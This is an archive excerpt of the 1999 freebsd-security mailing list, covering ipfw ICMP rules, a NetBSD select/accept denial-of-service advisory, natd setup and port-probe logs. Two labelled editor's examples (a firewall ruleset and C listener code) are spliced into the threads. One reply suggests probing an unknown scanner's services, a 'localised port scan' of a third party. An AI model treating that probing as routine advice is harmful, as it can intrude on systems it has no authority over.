people can copy them and enable only what they think is useful/needed for
them? I'm sure something like this would be good - probably also good for
the handbook.

Tomaz
----
Tomaz Borstnar
"Love is the answer to the final question you ask" - Unknown

From owner-freebsd-security Mon Jan 18 16:47:09 1999
Date: Tue, 19 Jan 1999 01:47:00 +0100
From: Eivind Eklund
To: Christopher Nielsen
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Port of 'bugs' in ports tree
Message-ID: <19990119014700.D42642@bitbox.follo.net>
In-Reply-To: from Christopher Nielsen on Mon, Jan 18, 1999 at 07:18:59AM -0800

On Mon, Jan 18, 1999 at 07:18:59AM -0800, Christopher Nielsen wrote:
> Poking around in the ports tree this morning, I noticed a port under
> ports/security called bugs. It caught my attention because pkg/DESCR says
> it's a crypto library. Having never heard of it, I decided to take a look
> at it.
>
> After perusing the code and reading through the description of the
> algorithm, I feel very strongly that a warning of some kind should be
> placed on this piece of software. This is NOT secure in any sense of the
> word (except possibly against little sisters/brothers). I can think of at
> least one cryptanalysis attack off the top of my head (poor source of
> random data), and that's after spending 10 minutes looking at the code and
> reading the algorithm.

If you write up a description of your attack and also submit it to the
author, I'll add a link to it from pkg/DESCR.

Eivind.
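Tomaz asks above for ipfw ICMP filters with comments, and the thread's position so far is that redirects should be stopped at the border while destination-unreachable, above all type 3 code 4, has to get through for path MTU discovery. The rc.firewall-style fragment below is an added example from the editor, not a ruleset posted by anyone on the list; the interface names ed0/tun0, the rule numbers and the dry-run default for $fwcmd are assumptions.

```shell
#!/bin/sh
# Added example (editor's, not a ruleset posted in this thread): commented
# ipfw ICMP rules in the style of rc.firewall.  The interface names, the rule
# numbers and the dry-run default for $fwcmd are assumptions; set fwcmd=ipfw
# (as rc.firewall does) to load them for real.
#
# Policy, following the thread:
#   - ICMP redirects (type 5) arriving on the outside interface are denied
#     and logged: a forged redirect rewrites a host's routing table, and a
#     router beyond the border has no business redirecting inside hosts.
#   - Destination unreachable (type 3) passes in both directions, because
#     code 4 (fragmentation needed) carries path MTU discovery; dropping it
#     stalls any TCP session whose path MTU is below the local MTU.
#     ipfw's icmptypes option matches the type only, so all of type 3 passes.
#   - Time exceeded (type 11) passes inbound so outbound traceroute works.
#   - Echo request (8) only outbound, echo reply (0) only inbound: we can
#     ping out, nobody can ping the LAN from the Internet.
#   - Any other ICMP touching the outside interface is denied and logged.

iif="${iif:-ed0}"            # inside interface (assumed)
oif="${oif:-tun0}"           # outside interface (assumed)
fwcmd="${fwcmd:-echo ipfw}"  # dry run by default: just print the rules

icmp_rules() {
    # First match wins in ipfw, so the redirect block goes before any pass.
    $fwcmd add 1000 deny log icmp from any to any in recv "$oif" icmptypes 5

    # Unreachables, including 3/4 fragmentation-needed (path MTU discovery).
    # Inbound keeps our own sessions alive; outbound lets remote peers
    # discover the MTU towards us.
    $fwcmd add 1010 pass icmp from any to any in recv "$oif" icmptypes 3
    $fwcmd add 1015 pass icmp from any to any out xmit "$oif" icmptypes 3

    # Time exceeded: traceroute replies for probes we sent.
    $fwcmd add 1020 pass icmp from any to any in recv "$oif" icmptypes 11

    # Echo: request out, reply in.
    $fwcmd add 1030 pass icmp from any to any out xmit "$oif" icmptypes 8
    $fwcmd add 1040 pass icmp from any to any in recv "$oif" icmptypes 0

    # Inside interface: ICMP unrestricted.
    $fwcmd add 1050 pass icmp from any to any via "$iif"

    # Everything else ICMP on the outside interface, logged for review.
    $fwcmd add 1060 deny log icmp from any to any via "$oif"
}

# Belt and braces on the gateway itself: have the kernel ignore redirects
# too (net.inet.icmp.drop_redirect is a FreeBSD sysctl; dry run via echo).
sysctl_rules() {
    ${SYSCTL:-echo sysctl} -w net.inet.icmp.drop_redirect=1
}

icmp_rules
sysctl_rules
```

Run as-is it only prints the rules; the logged denies of type 5 show redirect attempts, and a burst of logged type-3 denies on a stricter variant is the symptom of path MTU discovery being broken.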
From owner-freebsd-security Mon Jan 18 20:08:04 1999
Date: Mon, 18 Jan 1999 23:07:51 -0500
From: Christian Kuhtz
To: security@FreeBSD.ORG
Subject: icmp
Message-ID: <19990118230751.D5878@oreo.adsu.bellsouth.com>

Nate, et al,

You are right. If PMTU Discovery actually occurs, filtering ICMP unreachable-
need frag does break things. Mea culpa.

I had never seen it do that and based on that falsely concluded that it
wouldn't be affected, since one almost always got away with it (thanks to
widespread Ethernet). Learned a lot about ICMP processing in BSD while
reading the sources, though ;).

Nonetheless, calling people clueless and whatever else in private flames
isn't necessarily the format I wish this mailing list would take.
Particularly since several of us are making attempts at getting corporate
backing for FreeBSD development & deployment; my nomex underwear can take
it, the guys/gals with the money might not.

Thanks,
Chris

--
"We are not bound by any concept, we are just bound to make any concept
work better than others." -- Dr.
Ferry Porsche

[Disclaimer: I speak for myself and my views are my own and not in any way
to be construed as the views of BellSouth Corporation. ]

From owner-freebsd-security Mon Jan 18 21:09:08 1999
Date: Tue, 19 Jan 1999 00:09:02 -0500
From: Jared Mauch
To: Christian Kuhtz
Cc: security@FreeBSD.ORG
Subject: Re: icmp
Message-ID: <19990119000902.A11438@puck.nether.net>
In-Reply-To: <19990118230751.D5878@oreo.adsu.bellsouth.com>; from Christian Kuhtz on Mon, Jan 18, 1999 at 11:07:51PM -0500

On Mon, Jan 18, 1999 at 11:07:51PM -0500, Christian Kuhtz wrote:
>
> Nate, et al,
>
> You are right. If PMTU Discovery actually occurs, filtering ICMP unreachable-
> need frag does break things. Mea culpa.
>
> I had never seen it do that and based on that falsely concluded that it
> wouldn't be affected, since one almost always got away with it (thanks to
> widespread Ethernet). Learned a lot about ICMP processing in BSD while
> reading the sources, though ;).

Do not fear, this is a common mistake actually, the problem is that it
becomes too common.
People use filtering icmp as a hack fix in cases to drop traffic that
could be DoS or otherwise unrelated. I remember several years ago getting
icmp redirects sent halfway across the world from broken routers, and
attempted to do a great deal of work to get people to fix them :)

What is good is not telling people that "you're an idiot, that breaks
stuff", but taking the time to explain why and how it can, and help
educate and require your vendors (both in the Free software community,
and in the Commercial megabucks world) to comply with them once you've
learned why and how these things are in place.

We were all without clue once, let's help :)

- jared

--
Jared Mauch  | pgp key available via finger from jared@puck.nether.net
clue++;      | http://puck.nether.net/~jared/  My statements are only mine.

From owner-freebsd-security Tue Jan 19 03:05:44 1999
From: Darren Reed
Date: Tue, 19 Jan 1999 22:05:14 +1100 (EDT)
To: ck@adsu.bellsouth.com (Christian Kuhtz)
Cc: security@FreeBSD.ORG
Subject: Re: icmp
Message-Id: <199901191105.WAA19295@cheops.anu.edu.au>
In-Reply-To: <19990118230751.D5878@oreo.adsu.bellsouth.com> from "Christian Kuhtz" at Jan 18, 99 11:07:51 pm

Before you go, there is one mitigating
circumstance with ICMP unreachable messages. On some IP implementations,
they can be used to effect a denial of service attack due to mishandling
of the error message (it causes open and established connections to be
closed).

Darren

From owner-freebsd-security Tue Jan 19 06:01:40 1999
From: r.yeardley@hunter13.com (Richard Yeardley)
To: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw filters for icmp which don't break things - Was: Re: Small Servers - ICMP Redirect
Date: Tue, 19 Jan 1999 14:04:07 GMT
Organization: Hunter 13
Message-ID: <36a59038.350804179@smtp.dial.pipex.com>
In-Reply-To: <4.1.19990119010408.02c0d7d0@195.250.206.101>

Here's a snippet
from my rc.firewall - it allows outgoing pings and traceroutes (and their
appropriate return values) but doesn't allow anyone to ping my LAN from
the internet.

$iif is set to ed0
$oif is set to tun0

    # Allow any ICMP packets to pass on inside i/f
    $fwcmd add pass icmp from any to any via ${iif}

    # Allow outbound pings
    $fwcmd add pass icmp from any to any in recv ${oif} icmptypes 0
    $fwcmd add pass icmp from any to any out xmit ${oif} icmptypes 8

    # Allow outbound traceroutes
    $fwcmd add pass icmp from any to any in recv ${oif} icmptypes 3
    $fwcmd add pass icmp from any to any in recv ${oif} icmptypes 11

On Tue, 19 Jan 1999 01:06:32 +0100, it was written:
>
>Would some kind soul provide ipfw filters for icmp with some comments so
>people can copy them and enable only what they think is useful/needed for
>them? I'm sure something like this would be good - probably also good for
>handbook.
>
>Tomaz
>----
>Tomaz Borstnar
>"Love is the answer to the final question you ask" - Unknown

From owner-freebsd-security Tue Jan 19 06:03:23 1999
Date: Tue, 19 Jan 1999 15:49:38 +0200
From: Ruslan Ermilov
To: Tomaz Borstnar
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw filters for icmp which don't break things
Message-ID:
 <19990119154938.C6345@ucb.crimea.ua>
In-Reply-To: <4.1.19990119010408.02c0d7d0@195.250.206.101>; from Tomaz Borstnar on Tue, Jan 19, 1999 at 01:06:32AM +0100
X-Operating-System: FreeBSD 2.2.8-STABLE i386

On Tue, Jan 19, 1999 at 01:06:32AM +0100, Tomaz Borstnar wrote:
>
> Would some kind soul provide ipfw filters for icmp with some comments so
> people can copy them and enable only what they think is useful/needed for
> them? I'm sure something like this would be good - probably also good for
> handbook.
>
http://www.worldgate.com/~marcs/mtu/

Regards,
--
Ruslan Ermilov          Sysadmin and DBA of the
ru@ucb.crimea.ua        United Commercial Bank
+380.652.247.647        Simferopol, Ukraine
http://www.FreeBSD.org  The Power To Serve
http://www.oracle.com   Enabling The Information Age

From owner-freebsd-security Tue Jan 19 13:39:01 1999
Date: Mon, 18 Jan 1999 21:27:08 +0100 (CET)
Message-Id: <199901182027.VAA01249@sequoia.mondomaineamoi.megalo>
From: Stephane Legrand
To: Christopher Nielsen
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Port of 'bugs' in ports tree

Christopher Nielsen writes:
> Poking around in the ports tree this morning, I noticed a port under
> ports/security called bugs. It caught my attention because pkg/DESCR says
> it's a crypto library. Having never heard of it, I decided to take a look
> at it.
>
> After perusing the code and reading through the description of the
> algorithm, I feel very strongly that a warning of some kind should be
> placed on this piece of software. This is NOT secure in any sense of the
> word (except possibly against little sisters/brothers). I can think of at
> least one cryptanalysis attack off the top of my head (poor source of
> random data), and that's after spending 10 minutes looking at the code and
> reading the algorithm.
>
> Comments?
>

Did you try to contact the original author to discuss this problem with him?

--
Stephane.Legrand@wanadoo.fr               | FreeBSD Francophone
http://perso.wanadoo.fr/stephane.legrand/ | http://www.freebsd-fr.org/
"Let the developers develop and the bytes will be well looked after"

From owner-freebsd-security Tue Jan 19 23:06:48 1999
From: Kiril Mitev
Message-Id: <199901200703.HAA26541@idea.co.uk>
Subject: optimal fwall/proxy cfg for www ?
To: freebsd-security@FreeBSD.ORG
Date: Wed, 20 Jan 1999 07:03:58 +0000 (GMT)

I wonder if anyone can suggest what are the tradeoffs between those two
scenarios, assuming a non-forwarding gateway or firewall:

1.
run squid on the firewall. This I am quite sure is the faster option, both to configure and to run.
2. run squid outside of the firewall and (say) FWTK's http proxy on the firewall, or
3. run squid inside the firewall, with the same http proxy on the f/wall.

comments/ideas/flames, please...

Kiril


From: Matt Behrens
Date: Wed, 20 Jan 1999 13:49:57 -0500 (EST)
To: security@FreeBSD.ORG
Subject: NetBSD Security Advisory 1999-001: select(2)/accept(2) race condition in TCP servers (fwd)

Does this affect us, and is a similar patch planned? (Sorry, I haven't the talent.) :)

- Matt Behrens
  Network Administrator, zigg.com
  Engineer, Nameless IRC Network

---------- Forwarded message ----------
Date: Wed, 20 Jan 1999 20:53:52 +1100
From: Luke Mewburn
Reply-to: lukem@netbsd.org
To: BUGTRAQ@netspace.org, netbsd-announce@netbsd.org
Subject: NetBSD Security Advisory 1999-001: select(2)/accept(2) race condition in TCP servers

NetBSD Security Advisory 1999-001
---------------------------------

Topic:    select(2)/accept(2) race condition in TCP servers
Version:  All current versions of NetBSD
Severity: Problem may allow denial of service.

Abstract
========

A problem has been identified which allows remote attackers to wedge many TCP services running on 4.4BSD-derived systems, including X servers and all services run from inetd. Other (non-BSD) systems are believed to be affected as well.

Technical Details
=================

Many TCP servers open a TCP socket in the default blocking mode, use select(2) to wait for connections, and then accept(2) connections in blocking mode. Under some circumstances, the accept(2) may hang waiting for another connection, denying service to clients trying to connect to other ports.

The scenario which causes this is:

* Connection is initiated by client; 3WHS completes.
* Server process is awakened and select(2) succeeds.
* Connection is closed by client (e.g. by sending a RST). Connection is removed from accept(2) queue on server.
* Server process does an accept(2), which hangs waiting for a connection.

This scenario is sometimes difficult to reproduce, particularly if the server is very fast and the network is relatively slow. It is most effective if the server is slow and/or must do a lot of work between the select(2) and accept(2).
Solutions and Workarounds
=========================

Two solutions are possible:

1) Modify all TCP servers to use non-blocking listening sockets. Unfortunately, this requires changing a large amount of code, much of it maintained by third parties.

2) Modify the kernel to not remove sockets from the accept(2) queue when they are closed. A change that implements this has been added to NetBSD-current, and is available at:

   ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990120-accept

Thanks To
=========

Thanks go to Fyodor for providing nmap, with which this vulnerability was discovered. See http://www.insecure.org/nmap/ for more information.

Thanks to Charles M. Hannum for providing the solution.

More Information
================

Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.

Copyright 1999, The NetBSD Foundation. All Rights Reserved.
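The advisory's first solution, a non-blocking listening socket, written out as an added example. It is not code from the advisory, NetBSD or Matt's message; the helper names are hypothetical, and it binds 127.0.0.1 on an ephemeral port so it runs offline:

```c
/* Added example, not code from the NetBSD advisory or its kernel patch: the
 * user-space workaround the advisory lists as solution 1. A non-blocking
 * listening socket turns the race (select(2) woke us, then the client's RST
 * emptied the queue) into accept(2) failing with EWOULDBLOCK/EAGAIN or
 * ECONNABORTED, so the loop returns to select(2) instead of hanging. Helper
 * names are hypothetical; it binds 127.0.0.1 on an ephemeral port. */
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/socket.h>

/* TCP listener on 127.0.0.1:port (0 = kernel-chosen). Returns fd or -1. */
int open_listener(unsigned short port)
{
    struct sockaddr_in sin;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sin.sin_port = htons(port);
    if (bind(fd, (struct sockaddr *)&sin, sizeof sin) < 0 || listen(fd, 16) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* The fix itself: O_NONBLOCK on the *listening* socket. Returns 0 or -1. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);
    return flags < 0 ? -1 : fcntl(fd, F_SETFL, flags | O_NONBLOCK);
}

/* 1 if an accept(2) failure is harmless and should be retried: the advisory's
 * race (connection gone between select and accept) or a signal; else 0. */
int accept_error_is_transient(int err)
{
    return err == EAGAIN || err == EWOULDBLOCK || err == ECONNABORTED || err == EINTR;
}

/* The inetd-style loop: block in select(2), then accept(2). Serves max_accepts
 * clients with a banner and returns the count, or -1 on a hard error. A blocking
 * listener would sit in accept(2) forever once a client RST drained the queue;
 * the non-blocking one pays one spurious wakeup and carries on. */
int serve(int lfd, int max_accepts)
{
    int served = 0;
    while (served < max_accepts) {
        fd_set rfds;
        FD_ZERO(&rfds);
        FD_SET(lfd, &rfds);
        if (select(lfd + 1, &rfds, NULL, NULL, NULL) < 0 && errno != EINTR)
            return -1;
        int cfd = accept(lfd, NULL, NULL);
        if (cfd < 0 && accept_error_is_transient(errno))
            continue;                       /* nothing to serve: back to select() */
        if (cfd < 0) return -1;
        (void)write(cfd, "hello\r\n", 7);   /* a real server forks or hands off here */
        close(cfd);
        served++;
    }
    return served;
}

/* Check 1: accept(2) on an idle non-blocking listener returns at once with a
 * transient errno instead of blocking. 1 = yes, 0 = no, -1 = setup failed. */
int idle_accept_returns_immediately(void)
{
    int lfd = open_listener(0), ok;
    if (lfd < 0 || set_nonblocking(lfd) < 0) return -1;
    ok = accept(lfd, NULL, NULL) < 0 && accept_error_is_transient(errno);
    close(lfd);
    return ok;
}

/* Check 2: a loopback client connects (its 3WHS completes in the kernel before
 * accept(2) runs), serve() takes it, and the client reads the banner. 1 = ok. */
int serve_one_loopback_client(void)
{
    struct sockaddr_in sin;
    socklen_t len = sizeof sin;
    char buf[16];
    int rc = 0, cfd = -1, lfd = open_listener(0);
    if (lfd < 0) return 0;
    if (set_nonblocking(lfd) == 0 &&
        getsockname(lfd, (struct sockaddr *)&sin, &len) == 0 &&
        (cfd = socket(AF_INET, SOCK_STREAM, 0)) >= 0 &&
        connect(cfd, (struct sockaddr *)&sin, sizeof sin) == 0 &&
        serve(lfd, 1) == 1 && read(cfd, buf, sizeof buf) == 7)
        rc = memcmp(buf, "hello\r\n", 7) == 0;
    if (cfd >= 0) close(cfd);
    close(lfd);
    return rc;
}
```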
From: Gustavo Vieira G C Rios
Date: Wed, 20 Jan 1999 22:07:08 -0200
To: BSD-Stable, BSD-Security
Subject: Security

Dear Gentlemen,

I am running FreeBSD 2.2.8-Stable!
I would like to know where I can get a list containing all security bugs with bug fixes!
I need this very much, since my job is critical and I am supposed to make a high-security system.

I would appreciate any help.

Thank you for your time and cooperation.
Best regards


From: "David G. Andersen"
Date: Wed, 20 Jan 1999 17:54:39 -0700 (MST)
To: Gustavo Vieira G C Rios
Cc: BSD-Stable, BSD-Security
Subject: Re: Security

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories has the list of FreeBSD security advisories.

Note that that won't guarantee you a "high security" system; to do so, you'll also want to do other things to your system (disabling unnecessary services, setuid programs, etc). Discussions about this can be found in the archives of this list and others (such as bugtraq). There exist some utilities to help you manage setuid programs as well.

Please follow up all replies to -security.

-Dave

Lo and Behold, Gustavo Vieira G C Rios said:
> Dear Gentlemen,
>
> I am running FreeBSD 2.2.8-Stable!
> I would like to know where I can get a list containing all security bugs
> with bug fixes!
> I need this very much, since my job is critical and I am supposed to make
> a high-security system.
>
> I would appreciate any help.
>
> Thank you for your time and cooperation.
> Best regards

--
work: danderse@cs.utah.edu          me: angio@pobox.com
University of Utah                  http://www.angio.net/
Computer Science - Flux Research Group


From: Anthony Kim
Date: Thu, 21 Jan 1999 02:36:16 -0600
Organization: deus ex machina
To: security@FreeBSD.ORG
Subject: TCP port question IPFW

I'm sort of annoyed... there is some IP who is constantly filling up my ipfw logs with TCP port 1719 attempts daily. The hours are late in the evening until around 2am, then it begins again shortly after 6pm (he or she must have come home from work and felt like bugging me). More recently I see requests for TCP port 1106 in my logs as well from them. A quick search on the web showed 1719 was h323gatestat. Can someone tell me what that is? I didn't find anything on TCP port 1106 either. Any info is greatly appreciated.
Also, is there any way I can track this person down? traceroute works but no hostname returns. Sorry if this isn't the correct forum.

--
SYSADMIN(1)
sysadmin takes care of everything, is generally harangued, must be supplied with coffee, chocolate, and alcohol in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life.


From: Eivind Eklund
Date: Thu, 21 Jan 1999 09:56:07 +0100
To: Gustavo Vieira G C Rios
Cc: BSD-Security
Subject: Re: Security

Discussion moved to only security.

On Wed, Jan 20, 1999 at 10:07:08PM -0200, Gustavo Vieira G C Rios wrote:
> Dear Gentlemen,
>
> I am running FreeBSD 2.2.8-Stable!
> I would like to know where I can get a list containing all security bugs
> with bug fixes!
All security fixes are committed to the source tree; if you really are on -stable (the latest version along RELENG_2_2, at the moment), you should have them all. The only 100% reliable way to find out what has been fixed is 'cvs diff'.

Eivind.


From: Andrew McNaughton
Date: Fri, 22 Jan 1999 00:08:17 +1300 (NZDT)
Reply-To: andrew@squiz.co.nz
To: Anthony Kim
Cc: security@FreeBSD.ORG
Subject: Re: TCP port question IPFW

> I'm sort of annoyed... there is some IP who is constantly filling up my
> ipfw logs with TCP port 1719 attempts daily. The hours are late in the

If you're annoyed by the log entries, but not concerned by them, then don't log entries from their IP to that port. Among other things, this sort of practice makes it more likely you'll see important log info. Logging too much is a bad thing. OTOH, it can clutter your firewall ruleset.

> evening until around 2am, then it begins again shortly after 6pm (he or
> she must have come home from work and felt like bugging me).
> More recently I see requests for TCP port 1106 in my logs as well from them.
> A quick search on the web showed 1719 was h323gatestat. Can someone tell
> me what that is? I didn't find anything on TCP port 1106 either. Any
> info is greatly appreciated. Also, is there any way I can track this person
> down? traceroute works but no hostname returns.

You might be able to identify their service provider from other entries in the traceroute. Also, doing a reverse lookup on other IPs in the same class C network often clarifies who owns the network.

It's often possible to connect to services like telnet, smtp, ftp and get a machine name. This basically amounts to a localised port scan. It's easily justified, but I wonder if people ever get into trouble with their ISPs as a result of it.

Andrew


From: Fernando Schapachnik
Date: Thu, 21 Jan 1999 08:51:44 -0300 (GMT)
To: anthony@enteract.com (Anthony Kim)
Cc: security@FreeBSD.ORG
Subject: Re: TCP port question IPFW

In an earlier message, Anthony Kim wrote:
> I'm sort of annoyed... there is some IP who is constantly filling up my
> ipfw logs with TCP port 1719 attempts daily. The hours are late in the
> evening until around 2am, then it begins again shortly after 6pm (he or
> she must have come home from work and felt like bugging me). More
> recently I see requests for TCP port 1106 in my logs as well from them.
> A quick search on the web showed 1719 was h323gatestat. Can someone tell
> me what that is? I didn't find anything on TCP port 1106 either. Any
> info is greatly appreciated. Also, is there any way I can track this person
> down? traceroute works but no hostname returns.

    whois -h whois.arin.net

This should return data about the ISP, and then you can contact the sysadmin there.

Regards and good luck!

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA


From: jleclerc@galea.com
Date: Thu, 21 Jan 1999 08:53:28 -0500
To: security@FreeBSD.ORG
Subject: Re: TCP port question IPFW

h323gatestat comes from a videoconference, like NetMeeting.

/JOel

Anthony Kim on 99/01/21 03:36:16 wrote:
> I'm sort of annoyed... there is some IP who is constantly filling up my
> ipfw logs with TCP port 1719 attempts daily. The hours are late in the
> evening until around 2am, then it begins again shortly after 6pm (he or
> she must have come home from work and felt like bugging me). More
> recently I see requests for TCP port 1106 in my logs as well from them.
> A quick search on the web showed 1719 was h323gatestat. Can someone tell
> me what that is? I didn't find anything on TCP port 1106 either. Any
> info is greatly appreciated. Also, is there any way I can track this person
> down? traceroute works but no hostname returns.
>
> Sorry if this isn't the correct forum.
From: Mark Thomas
Date: Thu, 21 Jan 1999 10:08:44 -0500
To: freebsd-security@FreeBSD.ORG
Subject: ipfw/natd configuration

Hello,

I'm in the process of setting up a firewall using ipfw and natd. My intention is to use a FreeBSD (soon to be 3.0-stable) machine with three interfaces. IP addresses altered.

    fxp0 - Interface to private network (192.168.1.1/16).
    fxp1 - Interface to the world (555.12.12.230/29).
    fxp2 - Interface to visible machines (555.12.12.233/29).

The public machine is: 555.12.12.234/29

I'm a bit confused about setting up natd/ipfw. Here's where I am right now:

Custom kernel with IPFIREWALL and IPDIVERT enabled.

In rc.conf:

    gateway_enable="YES"
    firewall_enable="YES"
    firewall_type="/etc/firewall.rules"       # My own rule set will be applied
    firewall_quiet="NO"
    natd_enable="YES"
    natd_interface="fxp1"
    natd_flags="-f /etc/natd.rules"
    network_interfaces="fxp0 fxp1 fxp2 lo0"   # Does order matter?
    gateway_enable="YES"

In /etc/services:

    natd 8668/divert

The above combination should also add the ipfw rule to divert packets to natd correctly via rc.firewall, right?

First problem is setting up the actual natd rules. To allow the public machine to be seen, it would appear I need this to pass its address unchanged:

    redirect_address 555.12.12.234 555.12.12.234

Since all other internal addresses are unregistered, it would then appear that this would do the trick:

    unregistered_only yes

This leaves the firewall's own public address visible, reveals the public machine behind the wall, and remaps all private network addresses to that of the firewall, right?

Now for ipfw. My fundamental confusion is ipfw's idea of exactly where 'it' is, and of in vs. out. How does the natd interface specification affect this, or does it? Do the following seem like reasonable example rules (obviously a subset of actual rules):

Allow http connections from the world to 555.12.12.234 port 80:

    add 500 allow tcp from any to 555.12.12.234 80 in via fxp1
    add 501 allow tcp from 555.12.12.234 80 to any out via fxp1 established

Allow http connections from the private network to the world:

    add 525 allow tcp from 555.12.12.230 to any 80 out via fxp1
    add 526 allow tcp from any 80 to any in via fxp1 established

Allow http connections from the private network to the public machine:

    add 550 allow tcp from any to 555.12.12.234 80 in via fxp0
    add 551 allow tcp from 555.12.12.234 80 to any out via fxp0 established

Any pointers or comments appreciated.

Thanks,

-----
Mark

Mark Thomas -- pmpro, inc.
-- thomas@pmpro.com


From: Dan Busarow
Date: Thu, 21 Jan 1999 09:09:10 -0800 (PST)
To: Mark Thomas
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw/natd configuration

On Thu, 21 Jan 1999, Mark Thomas wrote:
> I'm in the process of setting up a firewall using ipfw and natd. My
> intention is to use a FreeBSD (soon to be 3.0-stable) machine with three
> interfaces. IP addresses altered.
>
> fxp0 - Interface to private network (192.168.1.1/16).
> fxp1 - Interface to the world (555.12.12.230/29).
> fxp2 - Interface to visible machines (555.12.12.233/29).
>
> The public machine is: 555.12.12.234/29
>
> I'm a bit confused about setting up natd/ipfw. Here's where I am right now:
>
> Custom kernel with IPFIREWALL and IPDIVERT enabled.
>
> In rc.conf:
>
> gateway_enable="YES"
> firewall_enable="YES"
> firewall_type="/etc/firewall.rules" # My own rule set will be applied

I suspect fixing the above line will clear up a lot of your confusion. This is not the name of a rule file, it is a label within /etc/rc.firewall, i.e., "SIMPLE".

> firewall_quiet="NO"
> natd_enable="YES"
> natd_interface="fxp1"
> natd_flags="-f /etc/natd.rules"

Try natd_flags="-s -m -u"

> network_interfaces="fxp0 fxp1 fxp2 lo0" # Does order matter?
> gateway_enable="YES"
>
> In /etc/services:
>
> natd 8668/divert
>
> The above combination should also add the ipfw rule to divert packets to
> natd correctly via rc.firewall, right?

No. You need to specify a divert rule. See the example /etc/rc.firewall

> First problem is setting up the actual natd rules. To allow the public
> machine to be seen, it would appear I need this to pass its address
> unchanged:
>
> redirect_address 555.12.12.234 555.12.12.234
>
> Since all other internal addresses are unregistered, it would then appear
> that this would do the trick:
>
> unregistered_only yes

You don't need redirect_address; unregistered_only (-u in my flags) does what it says. Only RFC1918 addresses will be NAT'd.

> Now for ipfw. My fundamental confusion is ipfw's idea of exactly where 'it'
> is, and of in vs. out. How does the natd interface specification affect
> this, or does it?

Read the comments in /etc/rc.firewall

Dan
--
Dan Busarow                        949 443 4172
Dana Point Communications, Inc.
dan@dpcsys.com                     Dana Point, California
83 09 EF 59 E0 11 89 B4 8D 09 DB FD E1 DD 0C 82


From: Anthony Kim
Date: Thu, 21 Jan 1999 12:36:59 -0600
Organization: deus ex machina
To: andrew@squiz.co.nz
Cc: security@FreeBSD.ORG
Subject: Re: TCP port question IPFW

I've tried the well-known services. Nothing doing. Why people bother -- I've no important data -- that's what I'd like to know.

Andrew McNaughton wrote:
>
> > I'm sort of annoyed... there is some IP who is constantly filling up my
> > ipfw logs with TCP port 1719 attempts daily. The hours are late in the
>
> If you're annoyed by the log entries, but not concerned by them, then
> don't log entries from their IP to that port. Among other things, this
> sort of practice makes it more likely you'll see important log info.
> Logging too much is a bad thing. OTOH, it can clutter your firewall
> ruleset.
>
> > evening until around 2am, then it begins again shortly after 6pm (he or
> > she must have come home from work and felt like bugging me). More
> > recently I see requests for TCP port 1106 in my logs as well from them.
> > A quick search on the web showed 1719 was h323gatestat. Can someone tell
> > me what that is? I didn't find anything on TCP port 1106 either. Any
> > info is greatly appreciated. Also, is there any way I can track this
> > person down? traceroute works but no hostname returns.
>
> You might be able to identify their service provider from other entries in
> the traceroute. Also, doing a reverse lookup on other IPs in the same
> class C network often clarifies who owns the network.
>
> It's often possible to connect to services like telnet, smtp, ftp and get
> a machine name. This basically amounts to a localised port scan. It's
> easily justified, but I wonder if people ever get into trouble with their
> ISPs as a result of it.
>
> Andrew

--
SYSADMIN(1)
sysadmin takes care of everything, is generally harangued, must be supplied with coffee, chocolate, and alcohol in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life.
From: Poul-Henning Kamp
Date: Fri, 22 Jan 1999 10:30:43 +0100
To: ports@FreeBSD.ORG, security@FreeBSD.ORG
Subject: TCP wrapper distribution copy has been trojaned...

http://www.news.com/News/Item/0,4,31274,00.html

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
From: "Oles' Hnatkevych"
Date: Fri, 22 Jan 1999 14:14:41 +0200
Organization: Private
To: freebsd-security@FreeBSD.ORG
Subject: rshd in messages

Hello!

In /var/log/messages I got:

    Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on illegal port 1093
    Jan 22 11:56:19 gw rshd[23778]: connection from 199.174.248.162 on illegal port 1204

What can it be? Did someone misspell an IP address?
--
Best wishes,

Oles Hnatkevych, http://gnut.kiev.ua

From owner-freebsd-security Fri Jan 22 06:35:02 1999
Message-ID: <36A88C19.284797A9@sim.net.ua>
Date: Fri, 22 Jan 1999 14:32:57 +0000
From: Pavel Narozhniy
To: "Oles' Hnatkevych"
CC: freebsd-security@FreeBSD.ORG
Subject: Re: rshd in messages
References: <36A86BB1.FE6D238A@uct.kiev.ua>

Oles' Hnatkevych wrote:
>
> Hello!
>
> In /var/log/messages I got:
>
> Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on
> illegal port 1093
> Jan 22 11:56:19 gw rshd[23778]: connection from on
> illegal port 1204
>
> What can it be? Someone misspelled an IP address?

Somebody from 199.174.248.162 is scanning TCP ports on your machine.
--
Pavel Narozhniy
nic-hdl: PN395-RIPE

From owner-freebsd-security Fri Jan 22 09:41:54 1999
From: mike@seidata.com
Date: Fri, 22 Jan 1999 12:41:32 -0500 (EST)
To: Poul-Henning Kamp
cc: ports@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: TCP wrapper distribution copy has been trojaned...
In-Reply-To: <2316.916997443@critter.freebsd.dk>

On Fri, 22 Jan 1999, Poul-Henning Kamp wrote:

> http://www.news.com/News/Item/0,4,31274,00.html

From Wietse himself (Bugtraq):

From wietse@PORCUPINE.ORG Fri Jan 22 12:38:11 1999
